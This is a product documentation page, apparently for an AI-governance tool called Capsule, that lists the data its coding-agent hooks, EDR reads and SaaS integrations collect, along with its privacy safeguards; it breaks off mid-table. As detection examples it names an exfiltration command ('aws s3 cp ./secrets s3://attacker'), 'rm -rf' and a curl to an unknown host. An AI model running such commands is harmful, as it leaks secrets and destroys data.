{"templateId":"markdown","sharedDataIds":{"sidebar":"sidebar-sidebars.yaml"},"props":{"metadata":{"markdoc":{"tagList":[]},"type":"markdown"},"seo":{"title":"Data Collection Overview","description":"Control the power of AI Agents in runtime.","llmstxt":{"hide":false,"sections":[{"title":"Table of contents","includeFiles":["**/*"],"excludeFiles":[]}],"excludeFiles":[]}},"dynamicMarkdocComponents":[],"compilationErrors":[],"ast":{"$$mdtype":"Tag","name":"article","attributes":{},"children":[{"$$mdtype":"Tag","name":"Heading","attributes":{"level":1,"id":"data-collection-overview","__idx":0},"children":["Data Collection Overview"]},{"$$mdtype":"Tag","name":"p","attributes":{},"children":["Capsule supervises the use of AI inside an enterprise. It does this in two complementary ways:"]},{"$$mdtype":"Tag","name":"ol","attributes":{},"children":[{"$$mdtype":"Tag","name":"li","attributes":{},"children":[{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["Endpoint agents (including coding agents)"]},": visibility into AI coding assistants running on developer laptops (Claude Code, Cursor, Cline), and visibility into AI-related activity surfaced by the customer's existing endpoint-security agents (Microsoft Defender for Endpoint, CrowdStrike Falcon)."]},{"$$mdtype":"Tag","name":"li","attributes":{},"children":[{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["SaaS and Cloud integrations"]},": visibility into AI services the organization has already licensed in the cloud (OpenAI, Microsoft 365 Copilot, Azure AI, Google Gemini, AWS Bedrock, Salesforce Agentforce, Microsoft Power Platform) and into the identity and device-management platforms that govern them (Okta, Microsoft Intune)."]}]},{"$$mdtype":"Tag","name":"p","attributes":{},"children":["Section 1 covers the endpoint side. Section 2 covers the SaaS/Cloud side. Section 3 sets out the cross-cutting privacy safeguards that apply across both."]},{"$$mdtype":"Tag","name":"hr","attributes":{},"children":[]},{"$$mdtype":"Tag","name":"Heading","attributes":{"level":2,"id":"1-endpoint-agents-including-coding-agents","__idx":1},"children":["1. Endpoint Agents (including coding agents)"]},{"$$mdtype":"Tag","name":"p","attributes":{},"children":["Two distinct data sources sit on the employee endpoint:"]},{"$$mdtype":"Tag","name":"ul","attributes":{},"children":[{"$$mdtype":"Tag","name":"li","attributes":{},"children":[{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["1A: Coding-agent hooks"]}," (1.1–1.4). A callback interface exposed by the coding assistant itself."]},{"$$mdtype":"Tag","name":"li","attributes":{},"children":[{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["1B: EDR integrations"]}," (1.5). A read-only view of AI-related activity that the customer's existing EDR is already producing."]}]},{"$$mdtype":"Tag","name":"Heading","attributes":{"level":3,"id":"11-what-this-is","__idx":2},"children":["1.1 What This Is"]},{"$$mdtype":"Tag","name":"p","attributes":{},"children":["Capsule helps security teams supervise how their developers use AI coding assistants (Claude Code, Cursor, and Cline). Like any modern security control (an endpoint EDR agent, a DLP gateway, or a CASB), Capsule needs visibility into the activity it is asked to protect."]},{"$$mdtype":"Tag","name":"p","attributes":{},"children":["The visibility comes from ",{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["hooks"]},": small callbacks that the coding assistants themselves expose. When a developer asks an AI assistant to do something on their laptop, the assistant pauses and asks Capsule, \"Is this allowed?\" Capsule answers in real time and records what was asked. ",{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["No keylogger, screen capture, browser monitoring, microphone, or general endpoint surveillance is involved."]}," The scope is strictly the developer's interactions with the AI coding assistant."]},{"$$mdtype":"Tag","name":"Heading","attributes":{"level":3,"id":"12-why-collection-is-necessary","__idx":3},"children":["1.2 Why Collection Is Necessary"]},{"$$mdtype":"Tag","name":"p","attributes":{},"children":["The risks Capsule was built to address cannot be detected without seeing the interaction itself:"]},{"$$mdtype":"Tag","name":"div","attributes":{"className":"md-table-wrapper"},"children":[{"$$mdtype":"Tag","name":"table","attributes":{"className":"md"},"children":[{"$$mdtype":"Tag","name":"thead","attributes":{},"children":[{"$$mdtype":"Tag","name":"tr","attributes":{},"children":[{"$$mdtype":"Tag","name":"th","attributes":{"data-label":"Risk"},"children":["Risk"]},{"$$mdtype":"Tag","name":"th","attributes":{"data-label":"Why visibility is required"},"children":["Why visibility is required"]}]}]},{"$$mdtype":"Tag","name":"tbody","attributes":{},"children":[{"$$mdtype":"Tag","name":"tr","attributes":{},"children":[{"$$mdtype":"Tag","name":"td","attributes":{},"children":[{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["Prompt injection"]},": a malicious file, web page, or repository instructs the assistant to act against the user."]},{"$$mdtype":"Tag","name":"td","attributes":{},"children":["Capsule must see the prompt and the tool the assistant tries to run, in order to detect \"the user did not ask for this.\""]}]},{"$$mdtype":"Tag","name":"tr","attributes":{},"children":[{"$$mdtype":"Tag","name":"td","attributes":{},"children":[{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["Source code or secrets exfiltration"]},": the assistant is tricked or instructed to send code to an external endpoint."]},{"$$mdtype":"Tag","name":"td","attributes":{},"children":["Capsule must see the command (e.g., a ",{"$$mdtype":"Tag","name":"code","attributes":{},"children":["curl"]}," to an unknown host) before it runs."]}]},{"$$mdtype":"Tag","name":"tr","attributes":{},"children":[{"$$mdtype":"Tag","name":"td","attributes":{},"children":[{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["Destructive actions"]},": ",{"$$mdtype":"Tag","name":"code","attributes":{},"children":["rm -rf"]},", force-pushing, dropping databases, deleting cloud resources."]},{"$$mdtype":"Tag","name":"td","attributes":{},"children":["Capsule must inspect the proposed shell command before execution."]}]},{"$$mdtype":"Tag","name":"tr","attributes":{},"children":[{"$$mdtype":"Tag","name":"td","attributes":{},"children":[{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["Use of unsanctioned models or MCP servers"]},": developers wiring untrusted tools into corporate workflows."]},{"$$mdtype":"Tag","name":"td","attributes":{},"children":["Capsule must see which model and which tools the agent is configured to use."]}]},{"$$mdtype":"Tag","name":"tr","attributes":{},"children":[{"$$mdtype":"Tag","name":"td","attributes":{},"children":[{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["Audit & incident response"]},": when something goes wrong, the security team must reconstruct what happened."]},{"$$mdtype":"Tag","name":"td","attributes":{},"children":["Capsule must retain a record of the session."]}]}]}]}]},{"$$mdtype":"Tag","name":"p","attributes":{},"children":["Stating only \"we collect prompts\" understates the picture. Capsule receives ",{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["structured events"]}," describing distinct actions the assistant proposes, with each field used for a defined purpose described below."]},{"$$mdtype":"Tag","name":"Heading","attributes":{"level":3,"id":"13-what-is-collected-by-category","__idx":4},"children":["1.3 What Is Collected, by Category"]},{"$$mdtype":"Tag","name":"p","attributes":{},"children":["Each category below lists (a) what the data is, (b) why it is collected, (c) where it comes from, and (d) the scope limit."]},{"$$mdtype":"Tag","name":"Heading","attributes":{"level":4,"id":"131-session-metadata","__idx":5},"children":["1.3.1 Session metadata"]},{"$$mdtype":"Tag","name":"ul","attributes":{},"children":[{"$$mdtype":"Tag","name":"li","attributes":{},"children":[{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["What:"]}," A session/conversation identifier, the timestamp, the AI model and version in use (e.g., \"Claude Sonnet 4.6\"), the assistant's version, and the working directory of the current project."]},{"$$mdtype":"Tag","name":"li","attributes":{},"children":[{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["Why:"]}," Group related events into a coherent session; produce audit trails; identify when a model that is not approved by the organization is being used."]},{"$$mdtype":"Tag","name":"li","attributes":{},"children":[{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["Source:"]}," Provided by the coding assistant itself."]},{"$$mdtype":"Tag","name":"li","attributes":{},"children":[{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["Scope limit:"]}," Working directory is a folder path (e.g., ",{"$$mdtype":"Tag","name":"code","attributes":{},"children":["/Users/jane/repos/payments-service"]},"). No filesystem scan, no enumeration of other directories."]}]},{"$$mdtype":"Tag","name":"Heading","attributes":{"level":4,"id":"132-user-identity","__idx":6},"children":["1.3.2 User identity"]},{"$$mdtype":"Tag","name":"ul","attributes":{},"children":[{"$$mdtype":"Tag","name":"li","attributes":{},"children":[{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["What:"]}," The signed-in user's identifier (email or platform username) as reported by the coding assistant."]},{"$$mdtype":"Tag","name":"li","attributes":{},"children":[{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["Why:"]}," Attribute activity to a person so the security team can investigate and so policies can be applied to the right user/group."]},{"$$mdtype":"Tag","name":"li","attributes":{},"children":[{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["Scope limit:"]}," No IP address, no MAC address, no hostname, no OS account, no device serial, no geolocation are collected. The identifier can be hashed before storage in deployments that require pseudonymization."]}]},{"$$mdtype":"Tag","name":"Heading","attributes":{"level":4,"id":"133-user-prompts-to-the-ai","__idx":7},"children":["1.3.3 User prompts to the AI"]},{"$$mdtype":"Tag","name":"ul","attributes":{},"children":[{"$$mdtype":"Tag","name":"li","attributes":{},"children":[{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["What:"]}," The text the developer typed into the AI assistant for that turn."]},{"$$mdtype":"Tag","name":"li","attributes":{},"children":[{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["Why:"]}," This is the only way to detect prompt injection (\"the assistant did X because something told it to, not because the user asked\"). It is also the only way to detect data classification violations (e.g., a developer pasting customer PII into the prompt)."]},{"$$mdtype":"Tag","name":"li","attributes":{},"children":[{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["Scope limit:"]}," Only text the user submits ",{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["to the AI assistant"]},". Capsule does not see the user's other typing, chat messages, browser activity, emails, terminal commands typed outside the assistant, or anything else on the laptop."]}]},{"$$mdtype":"Tag","name":"Heading","attributes":{"level":4,"id":"134-tool-calls-the-ai-proposes","__idx":8},"children":["1.3.4 Tool calls the AI proposes"]},{"$$mdtype":"Tag","name":"ul","attributes":{},"children":[{"$$mdtype":"Tag","name":"li","attributes":{},"children":[{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["What:"]}," Each tool the assistant tries to invoke and the parameters it intends to use. Examples: a shell command it wants to run, a file it wants to read or edit, an HTTP request it wants to make, an MCP (Model Context Protocol) call it wants to invoke."]},{"$$mdtype":"Tag","name":"li","attributes":{},"children":[{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["Why:"]}," This is the action layer where damage actually happens. Capsule evaluates each proposed action against policy and can ",{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["block it before it runs"]}," (e.g., deny ",{"$$mdtype":"Tag","name":"code","attributes":{},"children":["aws s3 cp ./secrets s3://attacker"]},")."]},{"$$mdtype":"Tag","name":"li","attributes":{},"children":[{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["Scope limit:"]}," Only tool calls the AI assistant proposes. A developer's own manual actions in the terminal or editor outside the assistant are not seen."]}]},{"$$mdtype":"Tag","name":"Heading","attributes":{"level":4,"id":"135-tool-results","__idx":9},"children":["1.3.5 Tool results"]},{"$$mdtype":"Tag","name":"ul","attributes":{},"children":[{"$$mdtype":"Tag","name":"li","attributes":{},"children":[{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["What:"]}," The output of a tool call after it ran, for example the standard output of a shell command, the result of a file edit, or the response of an MCP call."]},{"$$mdtype":"Tag","name":"li","attributes":{},"children":[{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["Why:"]}," Necessary for audit (reconstruct what actually happened) and for multi-step risk detection (e.g., assistant exfiltrates secrets it read in a previous step)."]},{"$$mdtype":"Tag","name":"li","attributes":{},"children":[{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["Scope limit:"]}," Only outputs of tools invoked by the AI assistant during that session."]}]},{"$$mdtype":"Tag","name":"Heading","attributes":{"level":4,"id":"136-configured-skills-and-mcp-tools","__idx":10},"children":["1.3.6 Configured skills and MCP tools"]},{"$$mdtype":"Tag","name":"ul","attributes":{},"children":[{"$$mdtype":"Tag","name":"li","attributes":{},"children":[{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["What:"]}," The list of skills and MCP servers configured for the assistant on this device (names, descriptions, and the wiring metadata, not their internal source code)."]},{"$$mdtype":"Tag","name":"li","attributes":{},"children":[{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["Why:"]}," Inventory of the tools the assistant has access to. A skill that gives the assistant the ability to call an external API is itself a piece of attack surface that the security team needs to know exists."]},{"$$mdtype":"Tag","name":"li","attributes":{},"children":[{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["Scope limit:"]}," Configuration only. Capsule does not exfiltrate proprietary skill implementations."]}]},{"$$mdtype":"Tag","name":"Heading","attributes":{"level":3,"id":"14-what-is-collected","__idx":11},"children":["1.4 What Is ",{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["Not"]}," Collected"]},{"$$mdtype":"Tag","name":"p","attributes":{},"children":["To remove ambiguity, Capsule's hooks ",{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["do not"]}," capture any of the following:"]},{"$$mdtype":"Tag","name":"ul","attributes":{},"children":[{"$$mdtype":"Tag","name":"li","attributes":{},"children":["Keystrokes, screen contents, clipboard, microphone, or camera."]},{"$$mdtype":"Tag","name":"li","attributes":{},"children":["The user's filesystem at large, browser history, browser tabs, or non-coding-assistant applications."]},{"$$mdtype":"Tag","name":"li","attributes":{},"children":["Network traffic, OS logs, system metrics, or installed software inventory."]},{"$$mdtype":"Tag","name":"li","attributes":{},"children":["Source files the AI assistant never opened or modified."]},{"$$mdtype":"Tag","name":"li","attributes":{},"children":["IP address, hostname, MAC address, geolocation, device serial number."]},{"$$mdtype":"Tag","name":"li","attributes":{},"children":["Personal files outside the project the assistant is working in."]},{"$$mdtype":"Tag","name":"li","attributes":{},"children":["Activity that occurs when the AI assistant is not running."]}]},{"$$mdtype":"Tag","name":"p","attributes":{},"children":["If the assistant is closed, Capsule receives nothing. The hooks are inert outside the assistant's process."]},{"$$mdtype":"Tag","name":"Heading","attributes":{"level":3,"id":"15-edr-integrations-microsoft-defender-crowdstrike-falcon","__idx":12},"children":["1.5 EDR Integrations (Microsoft Defender, CrowdStrike Falcon)"]},{"$$mdtype":"Tag","name":"p","attributes":{},"children":["The customer almost always runs an Endpoint Detection & Response (EDR) agent on every laptop already. Microsoft Defender for Endpoint and CrowdStrike Falcon are the two Capsule integrates with today. Capsule does not deploy its own EDR, replace the customer's EDR, or duplicate its telemetry. Instead, Capsule connects to the EDR's own administrative API and reads a narrow slice of what the EDR already collected."]},{"$$mdtype":"Tag","name":"Heading","attributes":{"level":4,"id":"151-what-this-is-for","__idx":13},"children":["1.5.1 What this is for"]},{"$$mdtype":"Tag","name":"p","attributes":{},"children":["The goal is ",{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["shadow-AI discovery"]},": identifying AI tools that have been installed on employee laptops without going through procurement, and correlating Capsule's other findings with the customer's existing EDR detections. Without this view, an organization has no reliable way to know which employees are running which AI assistants."]},{"$$mdtype":"Tag","name":"Heading","attributes":{"level":4,"id":"152-what-is-read","__idx":14},"children":["1.5.2 What is read"]},{"$$mdtype":"Tag","name":"ul","attributes":{},"children":[{"$$mdtype":"Tag","name":"li","attributes":{},"children":[{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["Device inventory"]},": hostnames, OS, owner, last-seen timestamps."]},{"$$mdtype":"Tag","name":"li","attributes":{},"children":[{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["Installed software inventory"]},": software names and versions, ",{"$$mdtype":"Tag","name":"em","attributes":{},"children":["filtered"]}," to AI-related applications (e.g., Cursor, Claude Code, Copilot installers, ChatGPT desktop, local model runners)."]},{"$$mdtype":"Tag","name":"li","attributes":{},"children":[{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["Targeted hunting query results"]},": process executions, command lines, and DNS lookups associated with known AI tools and local model runtimes. The hunting queries are scoped to AI-relevant patterns, not the customer's full process telemetry."]},{"$$mdtype":"Tag","name":"li","attributes":{},"children":[{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["Detection and alert metadata"]},": IDs, severity, timestamps, and rule names of detections the EDR has already raised that relate to AI tools or to assets Capsule has identified as risky."]}]},{"$$mdtype":"Tag","name":"Heading","attributes":{"level":4,"id":"153-what-is-read","__idx":15},"children":["1.5.3 What is ",{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["not"]}," read"]},{"$$mdtype":"Tag","name":"ul","attributes":{},"children":[{"$$mdtype":"Tag","name":"li","attributes":{},"children":["The customer's full EDR telemetry firehose (file events, network connections, memory scans, etc.)."]},{"$$mdtype":"Tag","name":"li","attributes":{},"children":["The contents of files on disk, browser histories, or user documents."]},{"$$mdtype":"Tag","name":"li","attributes":{},"children":["Personal communications, screen contents, or anything outside the EDR's normal scope."]},{"$$mdtype":"Tag","name":"li","attributes":{},"children":["Threat-intelligence or malware-analysis data unrelated to AI tool discovery."]}]},{"$$mdtype":"Tag","name":"p","attributes":{},"children":["Capsule sees only what the EDR's admin API returns for the AI-scoped queries the customer has authorized: a strict subset of what the customer's security team can already read from their EDR console."]},{"$$mdtype":"Tag","name":"Heading","attributes":{"level":4,"id":"154-authorization","__idx":16},"children":["1.5.4 Authorization"]},{"$$mdtype":"Tag","name":"div","attributes":{"className":"md-table-wrapper"},"children":[{"$$mdtype":"Tag","name":"table","attributes":{"className":"md"},"children":[{"$$mdtype":"Tag","name":"thead","attributes":{},"children":[{"$$mdtype":"Tag","name":"tr","attributes":{},"children":[{"$$mdtype":"Tag","name":"th","attributes":{"data-label":"Control"},"children":["Control"]},{"$$mdtype":"Tag","name":"th","attributes":{"data-label":"How it works"},"children":["How it works"]}]}]},{"$$mdtype":"Tag","name":"tbody","attributes":{},"children":[{"$$mdtype":"Tag","name":"tr","attributes":{},"children":[{"$$mdtype":"Tag","name":"td","attributes":{},"children":[{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["Customer-authorized credentials"]}]},{"$$mdtype":"Tag","name":"td","attributes":{},"children":["Connected via the EDR's standard service-to-service OAuth or API-key flow, by the customer's security administrator."]}]},{"$$mdtype":"Tag","name":"tr","attributes":{},"children":[{"$$mdtype":"Tag","name":"td","attributes":{},"children":[{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["Scope-limited queries"]}]},{"$$mdtype":"Tag","name":"td","attributes":{},"children":["The hunting queries Capsule runs are AI-discovery–specific. The full list is documented and can be reviewed before enabling the integration."]}]},{"$$mdtype":"Tag","name":"tr","attributes":{},"children":[{"$$mdtype":"Tag","name":"td","attributes":{},"children":[{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["Read-only"]}]},{"$$mdtype":"Tag","name":"td","attributes":{},"children":["Capsule does not push policy, quarantine devices, or trigger responses through the EDR."]}]},{"$$mdtype":"Tag","name":"tr","attributes":{},"children":[{"$$mdtype":"Tag","name":"td","attributes":{},"children":[{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["Revocable"]}]},{"$$mdtype":"Tag","name":"td","attributes":{},"children":["The customer can revoke Capsule's credential at any time from inside the EDR's admin console; data flow stops immediately."]}]},{"$$mdtype":"Tag","name":"tr","attributes":{},"children":[{"$$mdtype":"Tag","name":"td","attributes":{},"children":[{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["Lawful basis"]}]},{"$$mdtype":"Tag","name":"td","attributes":{},"children":["The customer is already entitled, under its existing EDR contract, to administrative access to this data. Capsule operates as an authorized recipient on the customer's behalf, under the customer's own employee-monitoring framework."]}]}]}]}]},{"$$mdtype":"Tag","name":"p","attributes":{},"children":["General data-handling guarantees (tenant isolation, encryption, retention) apply equally to EDR data and are described in Section 3."]},{"$$mdtype":"Tag","name":"hr","attributes":{},"children":[]},{"$$mdtype":"Tag","name":"Heading","attributes":{"level":2,"id":"2-saas-and-cloud-integrations","__idx":17},"children":["2. SaaS and Cloud Integrations"]},{"$$mdtype":"Tag","name":"Heading","attributes":{"level":3,"id":"21-what-this-is","__idx":18},"children":["2.1 What This Is"]},{"$$mdtype":"Tag","name":"p","attributes":{},"children":["Most organizations already pay for AI inside SaaS and Cloud platforms (Microsoft 365 Copilot, OpenAI ChatGPT Enterprise, Salesforce Agentforce, Azure AI Foundry, AWS Bedrock, and others), and they need a single place to govern the agents, prompts, tool calls, and data those services are exposed to."]},{"$$mdtype":"Tag","name":"p","attributes":{},"children":["Capsule connects to these platforms ",{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["via the platforms' own administrative APIs"]},", using credentials the customer's IT administrator authorizes. Nothing is intercepted at the network layer; nothing is installed on the SaaS vendor's infrastructure. Capsule reads what the vendor's API offers an administrator, on a schedule the customer configures. The customer chooses which integrations to enable and can revoke access at any time through the upstream platform."]},{"$$mdtype":"Tag","name":"p","attributes":{},"children":[{"$$mdtype":"Tag","name":"em","attributes":{},"children":["Endpoint-security integrations (Defender, CrowdStrike) are covered in §1.5 as part of the endpoint side of the picture, not here."]}]},{"$$mdtype":"Tag","name":"Heading","attributes":{"level":3,"id":"22-categories-of-integration","__idx":19},"children":["2.2 Categories of Integration"]},{"$$mdtype":"Tag","name":"p","attributes":{},"children":["Capsule's SaaS and Cloud integrations fall into two functional categories. Each category is justified by a distinct security need and accesses a distinct slice of data."]},{"$$mdtype":"Tag","name":"Heading","attributes":{"level":4,"id":"221-identity--device-management-integrations","__idx":20},"children":["2.2.1 Identity & device-management integrations"]},{"$$mdtype":"Tag","name":"p","attributes":{},"children":[{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["Examples:"]}," Okta, Microsoft Intune."]},{"$$mdtype":"Tag","name":"ul","attributes":{},"children":[{"$$mdtype":"Tag","name":"li","attributes":{},"children":[{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["Why:"]}," To know ",{"$$mdtype":"Tag","name":"em","attributes":{},"children":["which employee"]}," an AI agent or workstation belongs to, so policies can be applied to the right user/group, and to deploy and reconcile the endpoint hooks described in Section 1 through the customer's existing MDM."]},{"$$mdtype":"Tag","name":"li","attributes":{},"children":[{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["What is read:"]}," Active users, profile attributes (name, email, title, department, manager), group memberships, device assignments. No message content, no email content, no documents."]},{"$$mdtype":"Tag","name":"li","attributes":{},"children":[{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["Auth:"]}," OAuth (admin-authorized), read-only scopes wherever the upstream platform supports it."]}]},{"$$mdtype":"Tag","name":"Heading","attributes":{"level":4,"id":"222-ai-platform-integrations","__idx":21},"children":["2.2.2 AI platform integrations"]},{"$$mdtype":"Tag","name":"p","attributes":{},"children":[{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["Examples:"]}," OpenAI ChatGPT Enterprise, Microsoft 365 Copilot, Microsoft Copilot Studio / Power Platform, Azure AI Foundry, Google Gemini Enterprise, AWS Bedrock, Salesforce Agentforce."]},{"$$mdtype":"Tag","name":"ul","attributes":{},"children":[{"$$mdtype":"Tag","name":"li","attributes":{},"children":[{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["Why:"]}," These are the platforms where employees and automated agents actually run prompts, call tools, and reach data. Without visibility here, the security team has no way to see who built which agent, what data sources it can reach, whether it has guardrails, and whether it is being used safely."]},{"$$mdtype":"Tag","name":"li","attributes":{},"children":[{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["What is read (inventory side, always):"]}," Agents/GPTs/Copilots/bots that exist in the tenant; which user owns them; the tools, plugins, MCP servers, knowledge bases, and data sources each agent is wired to; guardrail and access configuration; deployment channels."]},{"$$mdtype":"Tag","name":"li","attributes":{},"children":[{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["What is read (activity side, depends on the platform's own admin API):"]}," For platforms whose admin/compliance APIs expose conversation activity to the customer's administrators (e.g., OpenAI Compliance API, Microsoft 365 Copilot via Graph, Azure AI Foundry runtime traces, Salesforce Agentforce event logs), Capsule can ingest the same conversation and tool-invocation records that the customer's admin is already entitled to read. For platforms that only expose audit metadata (e.g., AWS Bedrock), only audit metadata is ingested."]},{"$$mdtype":"Tag","name":"li","attributes":{},"children":[{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["Important boundary:"]}," Capsule does not see anything the upstream vendor does not show the customer's administrator. The lawful basis for ingestion is the customer's pre-existing administrative entitlement under that vendor's own enterprise agreement."]},{"$$mdtype":"Tag","name":"li","attributes":{},"children":[{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["Auth:"]}," OAuth (admin consent), service-account API keys, or cloud-native IAM (e.g., AWS cross-account role assumption). Credentials are scoped to the minimum permissions required and stored encrypted."]}]},{"$$mdtype":"Tag","name":"Heading","attributes":{"level":3,"id":"23-what-is-collected-from-saascloud","__idx":22},"children":["2.3 What Is ",{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["Not"]}," Collected from SaaS/Cloud"]},{"$$mdtype":"Tag","name":"ul","attributes":{},"children":[{"$$mdtype":"Tag","name":"li","attributes":{},"children":["Capsule does ",{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["not"]}," read mailboxes, calendars, SharePoint/Drive documents, Slack/Teams DMs, or CRM records that are unrelated to AI agent activity. The Microsoft Graph and similar API scopes Capsule requests are restricted to the AI/agent surfaces of those platforms."]},{"$$mdtype":"Tag","name":"li","attributes":{},"children":["Capsule does ",{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["not"]}," intercept network traffic, terminate TLS, or sit inline with user requests. It reads from the platform's audit/admin API after the fact (or, for endpoint hooks, from the local AI assistant itself)."]},{"$$mdtype":"Tag","name":"li","attributes":{},"children":["Capsule does ",{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["not"]}," access end-user passwords, secrets, or session tokens of the integrated platforms. Only the OAuth/API credential the administrator issued is held, and it can be revoked from the upstream platform at any time."]},{"$$mdtype":"Tag","name":"li","attributes":{},"children":["Capsule does ",{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["not"]}," retain content the upstream vendor itself has redacted or aged out. What Capsule sees is bounded by what the vendor's API returns."]}]},{"$$mdtype":"Tag","name":"hr","attributes":{},"children":[]},{"$$mdtype":"Tag","name":"Heading","attributes":{"level":2,"id":"3-privacy-safeguards","__idx":23},"children":["3. Privacy Safeguards"]},{"$$mdtype":"Tag","name":"p","attributes":{},"children":["The safeguards below apply across both the endpoint side (Section 1) and the SaaS/Cloud side (Section 2). They are listed once, here, to avoid duplication."]},{"$$mdtype":"Tag","name":"div","attributes":{"className":"md-table-wrapper"},"children":[{"$$mdtype":"Tag","name":"table","attributes":{"className":"md"},"children":[{"$$mdtype":"Tag","name":"thead","attributes":{},"children":[{"$$mdtype":"Tag","name":"tr","attributes":{},"children":[{"$$mdtype":"Tag","name":"th","attributes":{"data-label":"Safeguard"},"children":["Safeguard"]},{"$$mdtype":"Tag","name":"th","attributes":{"data-label":"How it works"},"children":["How it works"]}]}]},{"$$mdtype":"Tag","name":"tbody","attributes":{},"children":[{"$$mdtype":"Tag","name":"tr","attributes":{},"children":[{"$$mdtype":"Tag","name":"td","attributes":{},"children":[{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["Tenant isolation"]}]},{"$$mdtype":"Tag","name":"td","attributes":{},"children":["All data is segregated by customer tenant in the database and at every query path. A customer never sees, and is never co-mingled with, another customer's data."]}]},{"$$mdtype":"Tag","name":"tr","attributes":{},"children":[{"$$mdtype":"Tag","name":"td","attributes":{},"children":[{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["Encryption"]}]},{"$$mdtype":"Tag","name":"td","attributes":{},"children":["TLS in transit; encryption at rest on the storage layer."]}]},{"$$mdtype":"Tag","name":"tr","attributes":{},"children":[{"$$mdtype":"Tag","name":"td","attributes":{},"children":[{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["Customer-controlled retention"]}]},{"$$mdtype":"Tag","name":"td","attributes":{},"children":["Customers determine how long Capsule retains their session and integration data, and can request deletion at any time."]}]},{"$$mdtype":"Tag","name":"tr","attributes":{},"children":[{"$$mdtype":"Tag","name":"td","attributes":{},"children":[{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["Pseudonymization option"]}]},{"$$mdtype":"Tag","name":"td","attributes":{},"children":["User identifiers can be hashed before storage where a customer's privacy regime requires it."]}]},{"$$mdtype":"Tag","name":"tr","attributes":{},"children":[{"$$mdtype":"Tag","name":"td","attributes":{},"children":[{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["Customer-controlled scope"]}]},{"$$mdtype":"Tag","name":"td","attributes":{},"children":["The customer's administrator decides which endpoint hooks and which SaaS/Cloud integrations are enabled. Prompt collection, shell-command collection, file-edit collection, EDR reads, and each SaaS/Cloud connector can be disabled independently. Disabling stops ingestion of that category immediately; revoking the upstream OAuth grant cuts SaaS/Cloud data off at the source."]}]},{"$$mdtype":"Tag","name":"tr","attributes":{},"children":[{"$$mdtype":"Tag","name":"td","attributes":{},"children":[{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["No background endpoint collection"]}]},{"$$mdtype":"Tag","name":"td","attributes":{},"children":["Endpoint coding-agent hooks only fire in response to actions the developer initiates inside the AI assistant. There is no scheduled scan, no background uploader, no idle endpoint telemetry."]}]},{"$$mdtype":"Tag","name":"tr","attributes":{},"children":[{"$$mdtype":"Tag","name":"td","attributes":{},"children":[{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["Customer-authorized credentials"]}]},{"$$mdtype":"Tag","name":"td","attributes":{},"children":["Every SaaS/Cloud and EDR integration is connected by an administrator of the customer's tenant, using that platform's standard admin-consent flow. Capsule never bypasses or scrapes."]}]},{"$$mdtype":"Tag","name":"tr","attributes":{},"children":[{"$$mdtype":"Tag","name":"td","attributes":{},"children":[{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["Least-privilege scopes"]}]},{"$$mdtype":"Tag","name":"td","attributes":{},"children":["Each integration requests only the scopes it needs (e.g., 